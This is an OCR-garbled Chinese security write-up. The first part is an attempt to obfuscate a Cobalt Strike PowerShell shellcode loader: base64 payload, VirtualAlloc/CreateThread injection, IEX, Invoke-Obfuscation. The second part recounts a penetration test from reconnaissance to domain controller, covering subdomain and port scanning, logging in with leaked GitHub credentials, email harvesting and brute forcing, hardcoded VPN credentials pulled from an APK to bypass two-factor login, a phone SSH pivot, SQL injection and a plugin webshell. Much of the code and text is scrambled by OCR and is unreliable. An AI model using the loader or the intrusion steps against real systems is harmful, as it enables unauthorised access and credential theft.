фроговз .ReferencedAssemb lies AddRange(B("System.d11", [PsOhject} Assembly. Location)} 
fparams.GeneratelnMewory = $True 

$result = $compiler.CompileAssesblyFromSource(Sparams, $assesbly) 


[8yte[]]fvar code = [System.Convert] : :FromBase645tring(~/Oi JAMAYInIMdDKi Iwi 11411 IVi 3ToD7dK 2 }Н/мс СУРОҒВАЇ муус BUA f BF IKI 11QÍ OLBAdCLQN FIRKAdBQiL8gY i 1ggAdP jPEmLNI 81 jH/ 

MeCswc MAC CASHXOA 340 30kde JY i 1gkAdNm мхі i 1g CAdOLBTSBOT LE JCRbWOF Zw LH/ AF hf os SGA 7 daG5 1 dA Bod? YuaVRoTHcw8 / / VW SXV 1d Xv2gGVnmn/ ЭХрҺААДАР sxyVERagNRUNTATgAAUIBOVAaf xv / 

V63BbHd JSaAACYIRSUL JTU1806 1Uu0/ /Vi c a0w1Ax / 1dXav9 TVmgt Bhh? /9Wf мАн ExwEAADH/hf ZOBIn56w loq 5X iXf ГУ CFORSF eMf /VMfOXagdRV 1Bot f С / /VewAvAAASx TS3Hf / pkhQEAAOn JAQAAGI v// / BvD? 
ARARAAAMARARAAAAAARAMAMARMANAMAMMARAAAAMAMAAMARAAMAMAMAAAAARAMARARUAMAPARE УС ЧАНАГЫ саНЫНЫн КЧ Оу НЕ» po 
ООДАААДААААДАААААААААААААЛААААААААААААДАДАААААААЛААЛАДААААААААДАААААААААДАДАДАДААААДААААДААААДААААААЛАААААДАААААЛАААААААДААААААААААААААААА 
ААААААААДААААЛАЛААААЛААААААААААЛААААААЛАДАДААДАЛАААААААААААААААААЛАДАДААЛАААДААЛДАААААААЛААААЛААААААЛАААВо8і WI Vv / 

VakBOABAAAGgAAE AAV2hY pFP)  9WTUQAARAABZVET ейхаЛАБААВТУт651001/ SWF wHTGiwc Bat XAdeVYws i p/f / /FTkyLjY5LjkxL | xXOQAAAAAA”) 


$buffes < (inject. func]: :VirtualAllor(8, $var code.tength + 1, [inject.funcsAllocetionType]::Reserve -bOr [inject.funcsAllocationType]::Commit, | 
inject. fueciMenoryProtectíon] : :ExecuteReadwrite) 
if ([Bool]!fpuffer) ( 

$global:result < 

return 


[System Runtime. InteropServices,Macshal]::Copy($var code, Ө, $buffer, $var code.Length) 
[IntPtr] $thread > [inject.func]::CreateThread(0, 9, $buffer, 8, 6, 8) 
if 《faooljtgthread) { 

$giobel:result < 7; 

return 
1 
$result? = [inject.func]::Waitforsingleobject($thread, [inject.funcsTime]::Iofinite) 
е 


If ([IntPtr]::size eq 8) { 

start job | patam($a) IEX $a ] -RunAs)2 -Argument $DoIt | wait-job | Receive-Job 
) 
else ( 

TEX Wott 


after payload coapress: 
Set-StrictMode -Version 2 


$eicar 


3bolt < &' 
$assesbly = @° 

using System; 

using System.Runtime.InteropServices; 

namespace inject ( 
public class func ( 

{Flags} public enum AllacationType { dt < 8x1080, Reserve = 8x208 | 

[Flags] public enum MemoryProtection ( fxecuteReadWrite < 0x40 ) 

[Flags] public enum Time : uint { Infinite = OxFFFFFFFF } 

{Di Import{*kernel32.d117}] public static extern IntPtr VirtualAlloc(IntPtr IpAddress, uint dwSire, uint flAllocationType, uint flProtect); 

[0llieport("kerneli2.d11")] public static extern IntPtr CreateThread(IntPtr lpThreadattributes, uint dwStackSize, IntPtr IpStartaddress, IntPtr lpParameter, uint 

dwCrentionflags, IntPtr ipThreadid); 

{D1} Import ("kerne]32.d}1"}] public static extern int WaitforSingleObject(IntPtr hMandle, Time dwMilliseconds); 


“е 


fcompiler = New-Object Microsaft.CSharp.CSharpCodeProvider 

params < New Object System. CodeDom, Compiler. Compi lerParameters 

$params ReferencedAs sesblies.AddRange(B("System.d1l^, [PsObject].Assembly.Location)) 
params Generatelntemory = $True 

$result < $compiler.CompileAssemblyFromSource($params, $assembly) 


луде данас code a. LSystem.Coniert 3; Econ ase eA 5t cing) “od, nel Lida sca Ren 13327 M Mes OR dec T. 0 кігЕлеселдегі (Wes OR e cT. To, ComPRESSTON, ОЕ АТАХ 

KoNVErt]::frombaSEGASTRINg( `1ZLfrqIwEMYf6Fxu/ 

5 JEy61SKOdREAtAh1SgHoSNRAr 29Р vX f Ya T7 CSTN2Pv? Zw  dBWBKC roDe 54cF VGF Tp3ugeC Iv20/ WFVxBtKsH)92 auCBUOyo gqokt gl yr Yvf 3LrA12HsC6L85As41r0mEEbTANS dd 14XRvSO ]Xs ct 7 ybTe f guXZW2t 25e f gpbac j zqhplC/K4DbEG. 
vf jEoviCanz C THTPr 12m2d9f e9vx95u25LDr jnpnyULOL Ty eowQux T L3Jm8 Jy? jcNu3QOt BF SHUT UBSOR py 52AJmz YABwP 3 07 qaU TMS FB) / BO«BF guilt fZ JAe 30444 /DY aq6oypUy YEKBXYSL 1H)OIN22bT7TT3 PT ykP YOW jt 70M ЭМН5ХУХ/ 

He SPXLS/ PRTBEDIT F2FCE at ази AL zRAV jHrDIMTtLa0Z г rE abiSBxAAOHRFC7p 1 tALeOHy jC fh9z th1nX)SusUMS Y zx38n5ae209txVdtpeTaagi TAa a4 T2 LaPDTBKGBI RégUDK HOqkpF beyaVCRHO 46k Tehipt/Z eSGNBuPhuOaPf JSNbVIPXSTEZ 


linxfusTATTOeevOlesB6tdYB1T2 j2Fg92523096G/x5Y fq? }гпА2 }OEXS 145 / Im/ 15VTSdCYVhZe f Az6xQH2JAMUKbOP ML BUBVE yn8OJN2zcL/gAv* ), (10. COMPRESSIOn.ComprésSIonmoDe] ::dECOmpHes$)). , [Te xt -eNcOdINS 27419) 
PREDER Y э vn eerie m наты 


*y 


fbuffer ~ [infect.func]::VirtualAlloc(80, $var code. Length + 1, [inject.funcsAllocastionType]::Reserve -bOr [injfect.funcsAllocationType]::Comwit, | 
inject. func eMemoryProtectíon] : :£xecuteReadiirite) 
if ([Bool]!Sbuffer) { 
$global:result < 3; 
return 
) 
[System.Runt ime. InteropServices marshal]: :Copy($var_code, 9, $buffer, Svar code.Length) 
[IntPtr] $thread » [inject.func]::CreateThread(0, 0, Sbuffer, 9, 0, 9) 
if ([8001]!$thread) { 
fglobsl:result < 7; 
return 
} 
$cesult2 = [inject. func]: :WaitForSingleObject($thresd, [inject.funceTime]:: Infinite) 
Li 


If ([IntPte]::size -eq 8) ( 


Start-job ( param($a) ТЕХ $a } -RunAs32 -Argument $00916 | wait-job | йесеіуе-2о% 
) 
else ( 

IEX $Dolt 
) 


因此 最 后 我 们 需要 通过 Invoke-Obfuscation 创 建新 


[Byte[]]$var code [System.Convert]: :FromBase64String 


НУР ERIS payload 





after paylosd compress 

+ (stel lid: © i $sntlL10(12]«'x^)( мен-Овјест IO.strtAmreADEr((Nek-OBjecT  Io.ComPRESSION.DEFlATesTreAM( [1O.MEmoryStream] [CONVErt]: : frombaSEGASTRI 171 freq wEMY FOR xU, 

5jBy61SKQUREAt hi SgWoSNR4r 29F vXf YaT7CSTNIPv? 2s DBNEKC r oDe 54C FVGFTp 3ugeCIv2q0/ +f Vx8tkmW992a0C BUoyo задом gl yr'YvF ji cA} 2HsC6LBSAS4 1 rOmEEbT ANSdd lAXRvSO] X ct 7 » yb T f guX2W?t 25e f gpbiC j 

ivf JE an zCTHTPr T Ja2d9 f e9Yx9SuZ5L0r jnpnyULO] Tv kowQuxTL 32882 y7 jc Nu IQA 8qf oHUrue' YABwP 3:07 aal THs (81/804 6€ 6406: Z 3Ае 3OAdA /OY aqboypily EX eXYGLLHXNN2 2b T7 T LLETPTykPYOM j t] 7OML SNHSXTX 
/dcSPXLS/pkT86ber1f2fCEafa3UTdL 2 RAV] HrDHMTtLa07 C FebIVEBXAAOHREC7p E tATeOMy x3ànSae200txvdtpeTaagi f4aímeT2 LaPDTBK68 LRAgUSK +НОдК pF bey avc RMO «6k LeWpUZ rS6NBwPhoOaPf jSNbVHMXOT 
1210хҒчЗТАТТОеФу01е586%4Ү817212Ғ6Р25730986/х5У41 jrnAJoEXS 145 /7е/ Lb T9dCiVhZe f Az 6xQH2 JAMUKbSPOML BUBVF ynBO N22 cL/gA«* ),[ lo CORPRE 55100. СощргЕ sSTonmoDe |: di Comptes 


+ [TExt.eNcOdINg]::AsCiI) ).ReaDtoeND( у 


replace 


[Byte[])$var code = (System.Convect]: :FromBaseéaString( 7 /O1 JARAAYInIPdDK it Twi LIAS 11943160743 JH/MCCSPGF ВА рес BNAc f ESF 1X 1110 L0 18AÓCL QHi FHRIKAdSQ Og YL1ggAdP JPEmL TS BI jh 
HeC suc BNAc c 4AHXQA 34030kde JV i 1gkAdMniwxL i 1gCAdOLBISBOT LE ICREM2F ZW1M/ 4FhfiWosS647doG51dABod2 1uaVRo THc ei / / у 93XV1dXV2gGVnan / 9ХОҺАДААҒ sxy VT RAgNRUMIL AT gAAUTBON Aa ху / 
V638bMd JSaAACY IRSUI JTU18061Uu0/ /Vi caDw1Ax/ 1dXav9 TVmgtBhh? / SWFwA«EwwEAADH/h f ZOBInS6wloqsXiXf /Vi cFoRSFeMf /VMfOXagdRV Bot 1 f gC/ /VewAVAAASx 35 IMT /pkQEAAON JAQAAG I v / / / BvD JGWAAAAAAAAAAAARAAAAAAAAMA 


АЛААДАДАДАЛАДАЛААААДАДАДАААДАДААААДАДАДАААДААДАЛАЛАДАДАЛААДАЛАДАДАДАЛАДААДАДАҒУ:7Х11%0М441Ь6061Е16615Ь6Е MS Am ICh jb21wYXRpYmx10yBNU91F 10 wt jA7IF dpbevd Mg 1o T AyOyBXTI c 2NDs gH OpZGVudC 821. jApO 
ФОДЛААДААААДАДААЛДААААДАДААААЛАААААЛАДАААДААААЛАААААДААААЛАЛААААЛАААЛААЛАААДААААААААААЛАААДААААААААДАДАДАДАААДААЛАДАААДЛАЛАААЛААААЛАЛАААЛАААДАДААААЛАААЛАДАА, AAA AWA AWAAAAAAAAAAAA 
ААЛДАЛАААДАЛААААЛАААЛАААААЛААДАЛАААЛАЛААААДАЛАААААААЛААААЛАЛААААААААААААЛААДАДААЛААААЛААААААААААЛАААААААВОВІ W i VV 

VakBoABANAGGAAE AAN ZHY pE Р1 /OMTUQARARAB2NT T LedXaAAgARB ТУ 5 Lon / SWF wit 6i uA AGEN Ys i p/ 4 / /WYKyU 5651 flock SEXOQAAARAA ) 


to 


gevilet 
MeW-OBjecT IO.strEAmreADEr((NeW-OBjecT — Io.ComPRESsION.OEFIATesTreAM( [IO.MEmoryStream] [CoNVErt J: :frombaSe64sTRING( `lZLfrqIwEMVf6F xU. 
5jBy61SKQdREAt 4h15gHoSNRAr79F vXf YaT 7C STNJPv« ин dBMBKCroDe54cF VG Tp3ug+C Iv290/ *FVxBtKaM4992auCBUoyo3gqoWt g Tyr Yvf jLcAL2HsCG6L85A541r70wE EbTANSdd) AXRVSO X c t7 +ybT e f guX7w2t 25ef gpbaC jzqhplC/Ks 
DbEGvf jEoviiC anz CTHTPr 1 Je2d9fe9Yx9SuZSLDr-jnpnyULO] TveowQux TL 328 JyZ jcNu3QUt SqF 9HUrueSORpGy 53AJmz YABwP 3207 qaUTMs Ғ82/ 8O«BF gMNNKf 23Ae JO4dA/DY aqGoypUyVEK AXYBL 1HXNN27bT7TI LTIPTykPYOW] t j 7001.3 
MHSXTX [dc SPXLS / pk UbGbec 16 2 6C Ca f a MIT dI RAV jr OHT tt AB Ze c FabWBOXAAOMRE C79 i CALeORy }С (Өт shlnX2SUsUMBY x 38n5ae209 t XV Zt ре T aagi Ttime T2 i aPDTBKGB IRS ОЭК Ниор bay aVCRM 6KO epUZ CSGNIwPhuDaP FS 
NbVAMMX9T1z InxfuJTATTOeOvOLesB6t dYB1T) jZF gP25730986/xSY jq1 jr nAJoEXS1dS / 7m/ ibVT9dC 1 VhZefAz 6xQH2 ANUKb9PoMLBUSVE yn80)N2 КЕЛЕСІ n .ComprEsSIonmoDe |: :dECompRes5) ) 
» [Text ,eNcOdINg]::ASCII) ).ReaDtoeND( ) 


ғ. софе-і 
[System Convert ] ::FromBese64String($evil ) 





重点 ; 你 需要 从 invoke-Obfuscation 输 出 的 内 容 中 剔除 | ， 
为 Cobalt Strike 模 板 会 处 理 这 个 


原文 的 图 片 实 在 是 太 模 糊 了 。 








本 地 测试 按照 提示 进行 替换 ， 并 保存 为 .ps1 文 件 ， 放 入 靶 机 测试 


жесе.” 
‘Wort » A 
tarseanly „ 7 
using system; 
using System.Runt ime. Interopservices; 
namespace inject ( 
pubhic class fux ( 
{flags} public emm Allocstiontype ( Comit + @x1000, Reserwn < екіде ) 
[flags] public enum memoryerotection ( Ехесибеледігізе + rte ) 
[Flags] public emm vine : uint ( ҚЫТ АК) 
[OL Tmport(*kernels2,d31"})} public static extern ntptF Virtwelallac(IntPtr Ipaddress, uint desire, sist FAIL viet fiprotect); 
iol mmport(7kernel32.4117)] public static extern IntPtr Cremetaread( IntPtr Lpiheeadattriautes, uint dstecksize, mntrte ipstartadóress, Intrite ipfalameter, uint deCrestion lags, ntete ipTheemdti) ; 
Tol1zmport(*kerne132.411*)] public static extern int writrorsingleObject(imtrtr wundle, Time dutillisecond 


Compiler « Newübject wicroseft. Cukarp .CharpCodeProvider 

‘por mms à мен-06)есі system. Codeoow. compiler Campi lerPar smeters 

Speram .heferencedkssenb] Les. Addtange(P( "System. dli", (ғ%06)ес). Avsenb)y Location) ) 
рест Generate revemory 。 3лғше 

Sresult = compiler Compt leassene lyrrewsource(Soecams, Tassesbly) 


er ——ÓPÓ I [Cote]: e ` rr veli 
Ахаб нт Сау ўмова s; зуг уос, 74212316917 луй е! эгов! ee DON 8. , аа ы m = "Wt cwm WT in ELIT on Api ALD jm Y23/ y Se AU J AGEE MP TU, 3/ 


ЖО элөө, TNR лоны aj ELA налы WO UATY OCR A ВЫ, IETS TPCRUA 2E XTE Y отете Злосна ори ZBORY мс Рог ЗВУ ласа тәр неше st yet мшу Y eq Анес ivt uL Abk ani D ra TOY a LONE SC MO AL 
3694545 ZEVAULWAIISBON LIC YUT ЦИ Рмн ANASA), (То. CoP ESS LON, COMPE 551016 ] :decorertss ) f 


Convert |ijéremtasesnstring (teni 
et func]: VirtvalAlloc(0, Svar, code.Length « 1, Linject.feceALlocationype]::Reserve -bOr [Inject.funceaLipcattonType ]; ‘Commit, [àn ject, (ум smematyprotec tion]: лесе) 
И 
ical герс» э, 
mg 
[System.muntine Interopservices marshal): :Copy (svar code, 8, uiter, ear code. Lengtn) 
{inttr sthread » [inject fum]: cresterhresd(t, 6; Sutter, ө, 0, 9) 
it (ао i sthread) ( 
еам: 


% > 
$result2 4 Linyert func}: witrorsinglend ject (sthreed, inject) func elime); infinite) 


Тисе: Иге -eq a) C 
start. job ( pacsm(fa) TEX fa ) -munis32 -Argumest soort | wait.job | Rective- 20b 





2088 


经 测试 ， 发 现 目前 此 方式 由 于 非 base64 导 致 报错 ， 导 致 脚本 无 法 执行 成 功 


yload fuas. psi 





保存 编辑 的 脚本 到 powershell 文 件 并 执行 。 当 Cobalt Strike 中 的 beacon 点 亮 ， 并 出 现 提示 
@sec_groundzero Aggressor 脚本 的 注意 之 后 成 功 。 


Cobak Smis yew Aneks ерове Hp 


pü =o m+ AG осеһт Pa Во 





如 果 我 们 同时 检查 原始 CS payload 和 修改 过 的 CS payload, 3xiProcess Hacker 我 们 看 到 我 们 并 
会 改变 beacon 的 行为 。 


CQBHAERAZWAZAFC AIMA JAPOARA8y (wA QG. 

EAE BARABOLAE НАРАА ZANI AY QEMAE QAQOABUAGMA| 

ЧАСА VOBHACRABARAAF T ACAR XAF E ALMA y AHUA, 
7 à 


A 
PP DU eorr MANGER AMO. Ab 


Ж XE AARQBVAE E ACE ZA ABA = 4 С n 
Xt p WAGE AU an y 15 АС EE 


ANC A AHQANQBRALRAC CARY AE WANQHLAL МАС J AE 
A MAL ^a 





RA RV ai GGG t ESL 


在 最 后 ， 整 体 实践 结果 发 现 ， 文中 提 至 1 的 cs powershell 混淆 的 思路 是 先 解 base64 再 解 gzip 压 缩 ， 然 
后 针对 payload 有 效 部 分 进行 专用 工具 混淆 。 而 目前 出 现 的 问题 是 ，payload 只 能 混淆 x86 的 ， 而 测 

试 x64payload 使 用 此 文 的 混淆 会 出 现 混 清 报 错 。 另外 x86 混 淆 之 后 再 通过 添加 新 变 后 的 

字符 过 程 目前 测试 会 导致 报错 ， 因 此 实验 未 能 达到 预期 目的 ， 这 部 分 内 容 会 在 后 续 虽 








渗透 实战 -从 打点 到 域 控 的 全 过 程 。 


本 次 内 容 主要 是 跟 大 家 分 享 一 次 完整 的 从 打点 到 域 控 的 实战 过 程 。 目 的 是 通 过 总 结 在 渗透 中 的 每 个 
阶段 ， 来 和 大 家 分 享 一 些 不 错 的 渗透 工具 、 渗 透 技巧 ， 以 及 我 个 人 一 些 浅薄 的 渗透 经 验 。 


ea ` | NL 


本 文 主要 内 容 分 为 三 个 阶段 : 
信息 收集 阶段 外 部 打点 阶段 内 网 渗透 阶段 
1. 信息 收集 阶段 


当 我 们 准备 渗透 一 个 目标 的 时 候 ， 往 往 都 是 从 信息 收集 阶段 开始 。 信 息 收 集 可 以 分 为 互联 网 端的 信 
息 收 集 和 内 网 的 信息 收集 。 互 联网 端 需要 收集 的 最 重要 的 资产 就 是 域名 资产 和 IP 资 产 。 每 个 企业 都 
会 有 自己 的 域名 和 I!P， 这 是 黑客 与 测试 人 员 关 注 的 重点 ， 其 次 是 企业 相关 的 账户 信息 、 服 务 信息 、 
指纹 信息 等 。 


让 我 们 从 域名 (DNS) 的 信息 收集 说 起 ， 收 集 DNS 的 方法 有 很 多 种 ， 可 以 通过 搜索 引擎 、 历 史 数 
据 、 网 站 爬虫 、SSL 证 书 、DNS 区 域 传送 、 暴 力 破解 等 方式 。 如 果 单 独 去 执行 每 一 种 方法 ， 可 能 需 
要 做 不 少 的 工作 。 下 面 我 介绍 一 款 优 秀 的 开源 工具 ， 它 可 以 完成 以 上 80% 以 上 的 工作 。 


Sublist3r 是 一 款 基 于 Python 实现 的 域名 收集 工具 。 它 基本 支持 上 面 提 到 的 大 部 分 方法 ， 从 搜索 引 
擎 、Virustotal、DNSdumpster、SSLCert 等 站 点 查找 子 域名 。 在 进行 域名 爆破 时 ， 程 序 会 使 用 到 一 
个 互联 网 DNS 服务 器 列表 ， 然 后 以 轮训 的 方式 来 进行 枚 举 任 务 。 这 种 方式 可 以 避免 因为 大 量 DNS 请 
求 所 导致 的 访问 受 限 。 
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sublist3r.py -d yahoo.co 


# Coded By Ahmed Aboul-Ela @abeul3 


n Baidu.. 
ch n Yahoo 
] Searching n Google 
Searching 


Virustotal 
[ n 65{ Certificates 
1 ow in PassiveO0NS 
{ Starting bruteforce module now using subbrute 
{ Total Unique Subdomains found: 14015 
{-] Start port scan now for the following ports: 80,443,21,22 
1d.yaho 80 
2018.yearinreview.yahoo.com - 80 








n 
Python sublist3r.py -d target.com -b -t 50 -o target.dns.txt 


当 程 序 将 扫描 结果 写 入 target.dns,txt 文 件 之 后 ， 我 们 就 有 了 这 个 目标 的 域名 资产 。 那 么 我 们 如 何 再 
获取 目标 的 IP 资 产 呢 ? 


我 的 方法 是 使 用 BASH 脚 本 将 文件 中 的 域名 解析 为 IP， 然 后 再 做 去 重 和 C 段 识别 处 理 ， 随 手 找 了 个 目 
标 域 名 用 于 演示 : 


сев горане Зее for ТТ target. dig tat (do hast 





foriin cat target.dns.txt ;do host $i|grep -E -o "([0-9](1,3)[.] (3[0-9](1,3] done 
|sort|unig|grep -E -o "([0-9](1,3)[.](3]"|uniq -clawk Ч ($1>=3) print $2"0/24"} 
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这 样 就 获取 到 了 目标 的 域名 资产 和 IP 资 产 。 


这 里 关于 IP 信 息 收 集 有 一 个 小 技巧 ， 就 是 渗透 一 些 大 型 目标 时 ， 在 目标 公司 有 AS (自治 系统 ) 的 情 
况 下 可 以 通过 这 个 运营 商 来 查询 目标 公司 的 自治 系统 号 和 CIDR 路 由 。 自 治 系统 
分 配 情况 也 可 以 在 IANA 查询 到 : 

Е HURRICANE ELECTRIC 


NTERNIE SERVICES 


е 


Quick Links 


Result Description 


B d 





有 了 DNS、IP 段 、C 段 列表 这 些 目标 的 基础 轮 廊 以后， 就 可 以 对 目标 进行 端口 和 服务 探测 ， 以 及 
Web 资 产 识 别 了 。 端 口服 务 探测 我 使 用 的 是 Nmap， 如 果 目 标 网 络 范围 超过 一 个 C 段 ， 我 通常 会 用 
Masscan，Mascan 也 可 以 将 扫描 结果 存储 为 Nmap 格 式 。 拿 到 XML 扫 描 结果 以 后 ， 再 用 Webmap 来 


解析 XML 扫描 结果 ，Webmap 还 有 一 个 好 处 就 是 可 以 团队 协作 。 它 的 扫描 结果 展示 如 下 : 


可 以 为 每 个 目标 打上 Critical、Checked、Vulnerabile 等 标签 ， 以 及 给 目标 添加 备注 、 生 成 拓扑 和 
PDF 报告 。 





如 果 不 需要 团队 协作 ， 不 想 搭建 服务 器 ， 还 可 以 使 用 nmap-bootstrap.xsl 模 板 将 Nmap 扫 描 结果 转换 
成 更 直观 ， 支 持 搜索 的 HTML 格 式 。 关 于 Nmap 的 Nse 玩 法 有 很 多 ， 以 后 可 以 单独 搞 个 技术 分 享 。 


Nmap -iL ips.txt -SS -T4 -A -sC -OA scanme xsltproc -o scanme.html nmap-bootstrap.xsl 
scanme.xml 


有 了 端口 、 服 务 等 信息 以 后 ， 我 开始 用 Eyewitness 来 了 解 目标 的 Web 资 产 情况 ， 这 是 个 基于 
Python, Headless (无 头 游览 器 ) 驱动 实现 的 快照 工具 。 它 除了 能 将 目标 Web 资 产 迅速 快照 ， 还 可 
以 识别 一 些 中 间 件 的 默认 页 (例如 : Tomcat、Jboss 等 等 ) ， 网 站 登陆 接口 ， 记 录 HTTP 响 应 头 ， 以 
及 页 面 源码 。 类 似 的 工具 还 有 GoWitness， 以 及 Nmap 的 http-screenshot-html.nse 脚 本 。 下 面 是 这 
个 工具 的 使 用 方法 及 演示 : 
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python EyeWitness.py —f target.com-dns.txt --web --active-scan —-add-http-ports | 
80,81,88,888,2082,2083,3122,4848,6588,7000,7001,7002,7003,8000,8080,8081,8089,8090.8599 
,8888,9000,9001,9200,9080,10000,10051,50000 --add-https-ports 443,8443,9043 


随便 找 个 公司 测试 一 下 扫 拱 结 


` 


5... .... Шаман... 
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Resolved to: 120 7? 124 97 


p Tete ЖА OTERI 


LE rered è үс Thing tee 


penn ines mon яға eae 


Li tae PORN ANE 





019 10.1 i * 
nati se Ci ode: 290 f е 
text ағалы 


kontent-type 





前 面 看 到 的 是 用 Eyewitness 解 析 DNS.txt， 我 们 也 可 以 直接 解析 Nmap 的 扫描 结果 : птар -T4 -iL 
ip.txt -oX scan.xml -p 
80,81,88,443,888,2082,2083,3122,4848,6588,7000,7001,7002,7003,8000,8080,8081,8089,8090, 
8443,8500,8888,9000,9001,9200,9043,9080,10000,10051,50000 -Pn --open -n python 
EyeWitness.py -x scan.xml --web --no-dns --active-scan 


在 测试 漏洞 之 前 ， 我 还 用 Git-all-secret 和 SimplyEmail 开 源 工具 收集 到 一 些 信息 : 从 Github 上 获取 到 
1 个 账号 和 密码 ， 以 及 一 些 内 网 域名 信息 。 使 用 SimplyEmail 从 搜索 引擎 和 元 数据 中 收集 到 部 分 目标 
的 邮箱 地 址 。 


在 信息 收集 阶段 完 也 以 后 ， 对 目标 情况 就 有 了 一 定 的 了 解 。 我 全 到 了 目标 的 IP 信 息 、DNS 信 息 、 
Web 资 产 情况 、 一 个 账号 密码 和 一 些 内 网 域名 信息 。 因 为 不 是 真正 的 APT， 项 目 仅 有 一 周 的 时 间 ， 
我 没有 做 更 详细 的 信息 收集 ， 直 接 是 进入 到 了 打点 阶段 


1. 外 部 打点 阶段 
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— со иан а Е? 我 做 的 第 一 件 事 是 直接 访问 公司 邮件 系统 OWA 登 录 页 面 ， 运 气 不 
错 ， 成 功 使 用 Github 上 收集 到 的 账号 登录 电子 邮箱 ， 在 邮箱 中 搜索 敏感 关键 字 并 没有 发 现 有 价值 的 

信息 。 那么 如 何 最 大 化 利用 这 个 账号 呢 ? 

е cQ 2%6 





^ 


Fue 231 | 


在 登录 页 面 的 Body 中 ， 可 以 查看 到 OWA 的 版 本 。 
15.0 对 应 的 版 本 是 Exchange2013， 使 用 EWS Editor 导 出 Allitems 中 公司 其 他 人 的 邮箱 : 


i EwsEditor - 1.20 120.1.15934 - EWS Editor - Exchange Service Configuration 
H 9 9 





Use Autedixcover or use Exchance Web Service UR, directly [Ck if өзім DES 
Autodiseorer Fesil Default = f 
9 Service URL https PEWS Exchange «sex ж» 
Example https //mail contoss com/EWS/Exchange азал 


Fote For Autodiscover against out of network servers gach аз quen d Online. 
yea should set disable SCP Autodiveover se thet only POX will be use You can | Ser I-AnchorMsilex header 


EWS Scheme Exchange20t3 


(4) Use Default Credextails z 
C) Use the following credentials instead of the defwalt Windows credentials 门 ] Set ХУР еро дема Бох header 
Defeats 


ë ; 
Vse credentials of mailbox being accessed er the those of the PWS wei Bh ыы 


Suggestion Use WPS/SMTT address and za demain for Оча] оа) 5 Mote For delegate access Log in as the 
C) Use shsth (Registration mest here been completed first) Mw {ме ы ки уст pes cd алары 


жүр 
Mote It s best to set the YcÀnchorMailbox 
header for Impersonation 


m 


Cancel 
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导出 后 的 文件 都 是 XML 格 式 ， 使 用 正则 表达 式 提取 与 此 邮箱 关联 的 邮件 地 址 : сах * | egrep -o '[0- 
Zz_]{3,}@[0-Z]{2,}(.[0-Z]{2,}))+' >email.txt // 我 们 会 获得 一 个 目标 公司 的 邮件 列表 有 了 其 他 人 的 邮件 地 
址 我 们 就 可 以 继续 对 其 他 人 进行 爆破 了 ， 运 气 好 的 话 我 们 会 碰 到 运 维 和 人员， 或 者 遇 到 一 些 具 有 VPN 
登陆 权限 的 账号 。 爆 破 工具 推荐 使 用 Exchange 的 滥用 工具 ruler。 


在 获取 到 的 几 个 弱 口 令 账 户 的 邮箱 中 ， 并 没有 获得 有 价值 的 东西 。 接 下 来 我 又 尝试 在 目标 公司 的 
VPN 客 户 端 上 尝试 登陆 收集 到 的 账号 ， 发 现 有 一 个 账号 密码 是 正确 的 ， 但 需要 动态 口令 牌 ， 当 时 果 
断 放 弃 了 ! 
Exchange 和 VPN 都 失败 以 后 ， 我 把 精力 转向 Web 资 产 的 漏洞 测试 。 我 尝试 了 以 下 操作 : 

1. 从 Eyewitness 中 寻找 各 类 管理 后 台 登 陆 接口 ， 进 行 花 式 爆破 和 绕 过 。 

2. 从 Nmap 扫 描 结果 中 寻找 可 能 存在 RCE 的 中 间 件 和 CMS。 

3. 寻找 上 传 点 尝试 Getshell 和 一 些 可 能 存在 漏洞 的 CMS。 

4. 在 网 站 上 找 官方 的 APP 下 载 进行 测试 。 在 测试 APP 时 ， 我 发 现 了 一 个 有 趣 的 现象 : 我 发 现 这 

家 公司 使 用 的 是 泛 微 OA 手 机 APP， 当 我 点 击 APP 时 竟然 会 自动 登陆 VPN : 
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点 击 右 上 角 的 VPN 发 现 ， 发 现 它 使 用 的 是 深信 服 YPN。 也 就 是 说 VPN 是 写 死 在 APK 文 件 中 的 ， 使 用 
Jadx-gui 分 析 这 个 APK 文 件 的 源码 ， 发 现 默认 账号 密码 就 在 里 面 : 





SANGFOR 


= i qO. ELEL] 
m 
— 
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同事 告诉 我 深信 服 VPN 可 以 使 用 AWORK 登 陆 ， 我 下 载 AWORK 党 试 连接 目标 公司 VPN， 输 入 账号 
密码 以 后 ， 竟 然 没有 提示 我 需要 VPN 动 态 口令 牌 ， 直 接 登 陆 成 功 ， 就 这 样 绕 过 了 PC 端 VPN 的 二 次 认 
证 。 


2415] "rias 


23:45 


20194698138 тюп 


geen C mous 





现在 已 经 成 功 从 手机 端 进入 目标 内 网 ， 接 下 来 就 是 从 手机 端 进行 内 网 渗透 ， 我 在 Android 手 机 上 使 用 
了 Termux，Termux 是 Android 上 一 个 强大 的 终端 模拟 器 。 我 将 手机 和 攻击 机 接 入 到 同一 个 WIFI 下 
面 ， 然 后 在 Android 上 开启 SSH 服 务 ， 攻 击 机 使 用 SSH Socks 动 态 代理 的 方式 接 入 内 网 。 


VPS: ssh-keygen && cp rsa id.pub /var/www/html Mobile: pkg install openssh && sshd wget 
&& cat іа rsa.pub > -/.ssh/authorized keys Attack End: Ssh -О 1080 
androiduser(QMobilelP —p 8022 
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1. 内 网 渗透 阶段 


接 入 内 网 以 后 我 发 现 除 了 OA 系统 ， 其 他 的 内 网 IP 全 部 访问 受 限 。 那 么 就 只 能 尝试 攻击 OA 系统 了 。 
使 用 Nmap 对 目标 系统 进行 全 端口 扫描 发 现 : 


Open 80 (OA 系统 ) Open 9090 (Openfire 即 时 通讯 系统 ) 


使 用 Burpsuite 抓 包 对 OA 系统 进行 漏洞 测试 ， 发 现 该 OA 系统 存在 多 处 SQL 注入 。 并 且 当 前 连接 数据 
库 的 账号 是 DBA， 通 过 SQL 注入 顺利 读 取 到 Openfire (即时 通讯 系统 ) 数据 库 中 后 台 的 账号 密码 。 
登陆 后 台 ， 上 传 编译 好 的 插件 ， 成 功 Getshell。 插件 下 载 地址 : 
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拿 到 这 台 主 机 以 后 ， 我 做 了 下 面 几 件 事 : агр -n 查看 arp 缓 存 ， 广 播 域 中 是 否 存在 通讯 ， 发 现 内 网 
多 台 主 机 。 ping 之 前 从 Github 收 集 到 的 域名 ， 发 现 可 以 直达 域 控 。 复 用 80 端 口 代理 ， 使 用 MSF 对 
域 控 进行 了 MS17-010 和 MS14-068 的 测试 ， 失 败 。 查看 系统 版 本 ， 内 核 版 本 ， 进 程 信息 ， 文 件 权限 
以 了 解 是 否 可 以 提 权 ， 结 果 失 败 。 翻 看 系统 文件 ， 未 发 现 有 价值 的 信息 。 测试 是 否 可 以 出 网 ， 发 

现 不 能 到 达 互 联网 ， 但 可 以 回 连 到 手机 。 


